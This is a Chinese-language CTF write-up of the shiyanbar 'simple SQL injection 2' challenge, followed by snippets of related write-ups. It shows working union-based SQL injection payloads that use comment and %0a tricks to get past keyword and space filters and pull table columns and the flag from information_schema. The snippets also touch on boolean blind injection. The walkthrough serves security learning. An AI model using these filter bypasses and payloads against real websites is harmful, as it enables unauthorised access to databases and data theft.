burp fuzz 發現過濾了
select -- ) 空格
而且它是直接die('sqli detected!')
,無法雙寫繞過,換大小寫試一下,也被過濾了。無法大小寫繞過。
%0aselect%0a
無法繞過,
/**/select/**/
和/*!select*/
可以繞過
由於無法使用)
,所以我們無法使用函式,報錯和database()都無法使用,無法獲取資料庫名,但是我們可以嘗試將所有的資料表都爆出來。
查列名
?id=-1'union/*!select*/column_name%0afrom%0ainformation_schema.columns%0awhere%0atable_name='flag'%23
查字段
?id=-1'union/*!select*/flag%0afrom%0aflag%23
flag
報錯注入,繞過技巧(%0a替代空格,/*!*/
,)
實驗吧 簡單的SQL注入2
首先輸入1,發現有將資料庫的查詢結果顯示出來 輸入單引號,發現錯誤,這時候可以猜測後台查詢語句 select name from table where id 可以先嘗試萬能密碼 查詢語句就變成 select name from table where id 會把所以結果都顯示出來一共三條記錄 接下...
實驗吧 簡單sql注入之3
簡單sql注入之3 以下皆根據布林盲注手工注入步驟並且借助burpsuite的intruder功能對資料庫名 表名等等進行爆破 需要注意 0x00 爆資料庫 方法一 可以通過burpsuite攔截資料報,更改ascii值重發獲取 1 and length database n 資料庫名長度是4 1 ...
實驗吧Web 中 簡單的sql注入之2
輸入union select order by這些關鍵字會提示sqli detected 說明對於關鍵字有防護 輸入1 union也會提示sqli detected 但是如果去掉空格 1union,則會返回正常,1 and 1 1 無空格 也返回正常 所以可能是過濾了空格。於是用 或 代替掉空格。1...